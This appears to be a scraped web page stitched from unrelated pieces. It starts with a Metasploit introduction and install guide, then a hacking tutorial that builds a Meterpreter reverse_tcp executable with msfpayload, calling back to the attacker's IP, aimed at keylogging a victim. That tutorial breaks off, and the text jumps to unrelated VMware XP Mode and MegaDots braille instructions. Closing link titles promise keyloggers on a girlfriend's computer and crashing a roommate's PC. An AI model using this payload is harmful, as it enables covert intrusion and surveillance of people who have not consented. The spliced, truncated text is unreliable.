This is my first contribution in an ongoing series on
detailing the best free, open source hacking and penetration tools
available. My goal is to show you some of the quality tools that IT
security experts are using every day in their jobs as network security
and pen-testing professionals. There are hundreds of tools out there,
but I will focus and those that meet four key criteria:
Open source
Free
High quality
Widely used and trusted in the IT security/pen-testing community
As such, no hacker/penetration tool box is complete without the addition of the versatile and powerful Metasploit.
What Is Metasploit?
Metasploit is
among the most widely used exploitation tools in the hacking/security
field. It's used by both novices and advanced professionals. Insecure.Org, run by Fyodor, the founder of Nmap,
annually surveys security professionals for their opinion on the top
security software. Metasploit has consistently ranked among the top ten
since its inception and currently ranks second. That should give you
some idea of how important Metasploit is in the security community.
Metasploit
is a self-described "framework" for cyber exploitation. As a framework,
it eases the effort to exploit known vulnerabilities in networks,
operating systems and applications, and to develop new exploits for new
or unknown vulnerabilities. As of last Thursday, Project Basecamp
announced the development of a Stuxnet-like module for Metasploit.
Metasploit has developed a Meterpreter
that when loaded into a target system, makes maintaining access and
controlling the target much easier. As such, every self-respecting
hacker (and even those without self-respect) should have some basic
knowledge of Metasploit. This series of articles will initially focus on
conferring at least a rudimentary understanding of how Metasploit works
and how it can be utilized by the hacker/penetration tester to own the
box, download data and cover your tracks.
A Little Background
Metasploit was
developed in 2003 as an open source project by H.D. Moore. Originally
developed in PERL, the developer team rewrote Metasploit in Ruby in
2007. This is critical, because you need to have Ruby on your system in
order to run Metasploit and to develop your own exploits.
After
many years of success in the hacker/penetration tester community, it was
purchased by Rapid7 in 2009. After its purchase, the Metaspoloit
framework was split into three versions. Two are commercial versions;
Metasploit Express and Metasploit Professional, the latter selling for
$1800. These two have nice GUIs and numerous bells and whistles,
including the automation of several attacks, but there is still a free
and open source community edition known as the Metasploit Community.
Fortunately, some independent developers at Armitage
have created a free and open source GUI for Metasploit that is both
beautiful and elegant, for those that prefer the point-and-click mode of
operation.
There
is a Windows version of Metasploit, but many of the features (raw IP
packet injection, wireless driver exploitation, SMB relaying attacks,
etc.) are unavailable in the Windows environment, though some of these
limitations can be overcome by using Cygwin or running Windows in a
virtual environment on Linux.
For these and other reasons, we will
commence this series using the more flexible command line interface
(CLI) version in Linux, and eventually we will install and use the
Armitage GUI.
Download and Installation
The first step in our process is to download and install Metasploit. Although there is a Windows version,
I will focus on the Linux version because of its greater flexibility
and capability. Let's walk through the download and installation on my
favorite Linux distro, Ubuntu.
To install the latest version of
the Metasploit 4 Framework (MSF4) on Ubuntu 10.04 (or any other
Debian-based distros), use the following commands. This downloads and
installs the generic Linux binary which comes bundled with all the
necessary components you need for Metasploit to install and run. This
should work for most users and is the easiest and quickest way to get
the Metasploit Framework running under Ubuntu and other Debian-based
Linux distros.
First open a terminal window and type: wget http://updates.metasploit.com/data/releases/framework-4.0.0-linux-full.run
If you’re installing on a 64-bit build of Ubuntu, use this instead: wget http://updates.metasploit.com/data/releases/framework-4.0.0-linux-x64-full.run
This downloads the current version of the Metasploit framework via Wget.
Before
you can run the installer, you need to make it executable. In the
terminal, you must change the mode to execute (x) for Metasploit: chmod +x framework-4.*-linux-full.run
And now execute the installer by getting root privileges by typing sudo and ./ with the name of our package: sudo ./framework-4.*-linux-full.run
You should then be prompted for your root password. After entering that, you should get a screen that looks something like this:
Go ahead and click Forward.
Agree to the terms of the license agreement and click Forward.
I suggest that you select Yes for automatic updates so that your exploit framework has the latest and greatest updates. Click Forward.
Here, Metasploit is asking whether you want to insert a different service script. You can just accept the default and hit Forward.
Be
patient now; it will take Metasploit a few minutes to install and build
your database. After it's done, you are ready to run Metasploit. Simply
type: msfconsole
Finally, you should be greeted by this screen.
You
have now successfully installed the world’s best open source exploit
framework and you are ready to begin system/network exploitation and pen
testing!
Please note that in my installation here, it warns me
that updating is recommended as the last update was 249 days ago. If you
want to update your framework, then type: sudo msfupdate
In my next article, we will look at the terminology and components of Metaspolit and then initiate a tried and true exploit.
Note: This is an advance topic.Read Carefully. Feel free to ask any kind of queries . We are always here to help you.
If you are really interested in network security, chances are you must have heard of the Metasploit over the last few years.
Now,
have you ever wondered what someone can do to your PC, by just knowing
your IP. Here's the answer. He could 0wN you, or in other words , he
could have full access to your PC provided you have
just a few security loopholes which may arise cause of even a simple
reason like not updating your Flash player last week, when it prompted
you to do so.
Metasploit is a
hacker's best friend, mainly cause it makes the job of exploitation and
post-exploitation a lot easier compared to other traditional methods of
hacking.
The
topic Metasploit is very vast in itself.However, i'll try keeping it
basic and simple so that it could be understood by everyone here. Also,
Metasploit can be used with several other tools such as NMap or Nessus (all these tools are present in Backtrack ).
In
this tutorial, i'll be teaching you how to exploit a system using a
meterpreter payload and start a keylogger on the victim's machine.
Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.
Before
I go into the details of The Metasploit Framework, let me give you a
little idea of some basic terms (may seem boring at first, but you must
be knowing them)
Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited resulting in notable damage.
Exploit:A piece of software that take advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.
Overflow: Error caused when a program tries to store data beyond its size. Maybe used by an attacker to execute malicious codes.
Payload: Actual code which runs on the compromised system after exploitation
Now, what Metasploit IS?
It is an open source penetration testing framework,
used for developing and executing attacks against target systems. It
has a huge database of exploits, also it can be used to write our own
0-day exploits.
METASPLOIT ANTI FORENSICS:
Metasploit
has a great collection of tools for anti forensics, making the forensic
analysis of the compromised computer little difficult. They are
released as a part ofMAFIA(Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer, Transmogrify.
Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPI
I
would recommend using the MSF Console because of its effectiveness
& powerful from a pentester’s P0V. Another advantage of this mode
is, several sessions of msfconsole could be run simultaneously.
I
would recommend you doing the following things in Metasploit, on a
Backtrack(system or image), avoiding the windows version of the tool.
For
those of all who don't know, Backtrack is a linux distro especially for
security personals, including all the tools required by a pentester.
Download Backtrack from here.
You can download the ISO or VMware image, according to the one you're
comfortable with. If you have 2 access to more than 1 system physically,
then go for the ISO image and install it on your hard disk.
Let the Hacking Begin :
Open up backtrack. You should have a screen similar to this.
The default login credentials are:
Username: root
Pass: toor
Type in
root@bt:~#/etc/init.d/wicd start
to start the wicd manager
Finally, type "startx" to start the GUI mode:
root@bt:~#startx
First of all, know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:
root@bt:~#ifconfig
It would be something like 192.168.x.x or 10.x.x.x.
Have a note of it.
Now,
Launch msfconsole by going to Applications>>Backtrack>>Metasploit Engineering Framework>>Framework Version 3>>msfconsole
You should now be having a shell something similar to a command prompt in windows.
msf >
Let’s now
create an executable file which establishes a remote connection between
the victim and us, using the meterpreter payload.
Open another
shell window (”Session>>New Shell” or click on the small icon on
the left of the shell tab in the bottom left corner of the window)
root@bt:/opt/metasploit3/msf3#
./msfpayload windows/meterpreter/reverse_tcp LHOST=”your local ip”
LPORT=”any port you wish” x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select 4444.
Even if your computer doesn’t have hardware virtualization, you can still
install XP Mode but just cannot run it as you can’t run Virtual PC. Enter
VMware Player. This free program lets you create and run virtual machines,
whether or not you have hardware virtualization. And, it can directly
import XP Mode so you can use that copy of XP for free. A couple features
are different, but it’s still a great replacement since you otherwise couldn’t
use it at all.
Note: XP Mode does not work on Home Versions of Windows 7 and you’ll need
VMware Player 3.0
Getting Started
First, download and install XP Mode (link below). There is no
need to download Virtual PC if your computer cannot run it, so just download the
XP Mode from the link on the left.
Install XP mode; just follow the default prompts as usual.
Now, download and install VMware player. The download is free, but
requires registration.
You may see some prompts about installing drivers; simply approve them.
We didn’t see them on our latest test, but have in the past. When you are
finished installing VMware Player, you will have to restart your computer.
Add XP Mode to VMware Player
Now that your computer is rebooted, run VMware Player. We can import XP
Mode by clicking File, then click "Import Windows XP Mode VM."
VMware Player will simply start importing your XP Mode. Converting XP
mode to VMware format may take a couple minutes depending on your hardware, so
just be patient.
When this is done, you should see a new virtual machine in VMware Player
called XP Mode! Click "Play Virtual Machine" to run XP Mode.
XP will run through it’s first-run setup process.
While it is loading, you may be prompted to install or update VMware
Tools. This is required to integrate XP Mode into your computer, so click
Update Tools or Install Tools depending on you situation.
The tools will automatically download and install, though you may have to
approve an UAC prompt.
Now you can proceed with your XP setup. Accept the license
agreement,
Choose your locale and keyboard settings
Enter a name for the virtual machine and an administrative password
And enter the correct date, time, and timezone. It usually gets the
correct time and date from your computer itself, but the time zone is often
incorrect.
XP will now finalize your changes, and then reboot.
When XP Mode restarts, choose your settings for updates.
Windows may ask to search for drivers. Simply press cancel, as VMware
Tools will contain everything we need.
After a short delay, you should see your XP desktop in VMware Player!
There’s one last thing that needs to be installed – VMware Tools. This
should automatically open in XP Mode; if not, click Start, then My Computer, and
finally double-click on the CD drive which should say VMware Tools.
Now, simply run the Tools installer with the Typical setup type, and reboot
the XP Mode when it’s finished.
Now VMWare is setup and we’re ready to start integrating it with Windows
7.
Integrate XP Mode in VMware Player with Windows 7
The real advantage of the default XP Mode in Windows 7 is that the XP
programs are fully integrated with their Windows 7 counterparts. You can
run them seamlessly with other programs, copy between them, and even open and
save files to the same folders.
Let’s set this up in VMware. Copy and paste from Windows 7 to XP Mode
in VMware is activated by default. To use your XP programs seamlessly with
Windows 7, click VM on the top of the VMware window, and click "Enter
Unity."
You can easily access any program or file in XP mode through a dedicated XP
Mode Start Menu. When you hover over your Windows 7 Start button, a new
button called "Windows XP Mode" will above it. Click there to access a
full start menu from XP Mode right in Windows 7.
Here is an IE 6 window from XP running side-by-side with IE 8 in Windows 7,
thanks to VMware Player!
By default, the virtualized windows will have a border and the VMware logo on
their edge.
To remove this logo, click VM in the VMware player window, then
settings. Click on the Options tab, and choose Unity on the left.
Now uncheck the boxes that say "Show borders" and "Show badges."
Without having the VMWare borders and badges give everything a more authentic
XP Mode look and feel.
You can even use removable devices, such as flash drives, in XP Mode in
VMware Player. Whenever you connect a new device to your computer, VMware
will remind you that you can add it to XP Mode.
Simply click VM, then Removable Devices. Select your device name, and
click Connect.
Save Files in XP Mode to My Documents in Windows 7
You may want to share the entire "C" drive of the Windows 7 with the virtual XP computer.
By default, files created in XP Mode in VMware Player will be saved inside
the virtual machine. It’s more convenient if they’re saved directly to the
My Documents folder in Windows 7, so let’s change this. Click VM, then
Settings. Click the Options tab, and then choose Shared Folders on the
left. Now click the bullet for "Always enabled" and check the box for "Map
as a network drive in Windows guests."
Now click Add at the bottom of that window. This will let us add a
shared folder.
Let’s add the My Documents folder from Windows 7. Click Browse, and
then select your My Documents folder. Click Ok, and then click Next.
Make sure the box is checked that says "Enable this share" and then click
Finish. You can now close the settings window as well.
Back in XP Mode, click Start, then right click on My Documents, and select
Properties.
Click Move to find the new My Documents folder.
Find the folder we just shared from Windows 7 by clicking My Computer, then
the drive that says "Shared Folders on ‘vmware-host’" or something
similar. Now select the folder we shared, Documents, and click Ok.
Click Ok in the main properties window. It may offer to copy the files
from your old My Documents folder to the new one; choose Yes to make sure you
have all of your documents in Windows 7.
Now, whenever you go to save a file in XP Mode, it will automatically save in
your My Documents folder on Windows 7. You can repeat the same process for
any folder you wish, such as your My Pictures and My Music folders.
Conclusion
That’s all … now you have your full XP Mode running on your computer without
hardware virtualization. Almost all the same features are there; the only
thing you’re missing is the Start Menu integration, but VMware’s menu is the
next best thing. In our tests using VMware worked as good or better as actual XP
Mode on a machine that supports hardware virtualization. If you’re frustrated
that the Windows 7 machine(s) you have don’t support XP Mode, using our VMware
method works, and allows you to use it on whatever machine you want.
Using Virtual Windows XP with MegaDots
Virtual Windows XP will allows you to run applications within the Virtual PC window.
Install MegaDots in the Windows XP window. Answer no to the question about full screen.
Close the Windows XP window before launching MegaDots.
Install the Virtual System (32 bit Windows)
Install MegaDots in the Virtual System
If needed, reduce the screen resolution on the Host system until the Virtual system can fill the screen.
Set the Virtual System to Full Screen
Maximize the MegaDots font size as much as you can without losing any part of the MegaDots screen
If needed, lower the screen resolution for the Virtual System so that the MegaDots screen is even larger.
If you are using Windows XP, change the font name and size on the print side. To do that, launch MegaDots and press
Alt-spacebar. Then press P and select the font tab. Choose MegaDots window braille as your font.
The idea in enlarging the font is to make the window as big as
possible without losing any part of the MegaDots screen.
Be aware that the window can never take up the whole screen. For most
laptops, we recommend 24 point for a sighted user, 20 point for a user
of
JAWS or Window-Eyes. If you are asked, save these parameters for future
use of this program.
Be aware that the MegaDots window braille font is
designed to work with screen font smoothing turned on. If the font appears
to have box-like braille dots without any shadow dots, you have screen
font smoothing turned off. On your desktop, right click, choose,
Properties, Appearance, click on Effects and make sure the screen font smoothing choice is checked.
To make the display work as well as possible in MegaDots, go to the MegaDots Preferences Menu, Editor.
Set Text size to N (Normal), as leaving it at C (Compact) causes problems. In the same form, also make sure
that Big cursor is set to No. Do not forget to save your Preferences.
In the installation example, the host Windows 7 C drive looks to the XP machine like the Z drive.
Open the Z drive from within MegaDots to read files from the host machine.
On the Windows 7 Desktop, from the Start Menu, you can locate All Programs, Windows Virtual PC,
Windows XP Mode Applications, Duxbury, MegaDots 2.5 without Speech. Right Click on this, and then
select Send to and then Desktop (create shortcut). This way you can launch MegaDots
directly from the Windows 7 Desktop. Using the y drive (see above), you can read and write from
the full Windows 7 hard drive. While there are some limitations, this is getting close to a full
use of MegaDots on a 64 bit system.
Some users find that using MegaDots in a window is distracting if there is too much going on outside the MegaDots window.
Here is an excellent red background for use with MegaDots in a window
right click on the image and select "Set as Background".
In order to import Word files, you do not need to have a copy of
Microsoft Word installed in the XP emulation.
In order to export to Word files, you do need to install a copy of
Microsoft Word in the XP emulation. Why? Because the
DBT engine within MegaDots has all the software it needs to read Word
files. But when MegaDots exports to Word, it is really
exporting to html, and then using your existing copy of Word with Word
automation to turn that into a genuine Word file. One approach is
to export to html from the XP emulation, and save the html files in the
Windows 7 computer. From the Windows 7 computer, you can
import the html files and Save As Word files. This is time consuming, but avoids needing to obtain another copy of Word.
In order to do the work you want to do in the XP emulation, you
many need to install other software programs, such as Adobe Reader
or any other that helps you get your work done. Or you may need to
install several printers for use within the emulation.
Remember that from the XP emulation, you can read any part of the
Windows 7 computer, but the Windows 7 computer cannot read
anything in the XP emul
Hack Like a Pro: How to Exploit and Gain Remote Access to PCs Running Windows XP
Hack Like a Pro: How to Remotely Install a Keylogger onto Your Girlfriend's Computer
Hack Like a Pro: How to Crash Your Roommate's Windows 7 PC with a Link
Subscribe to email feed
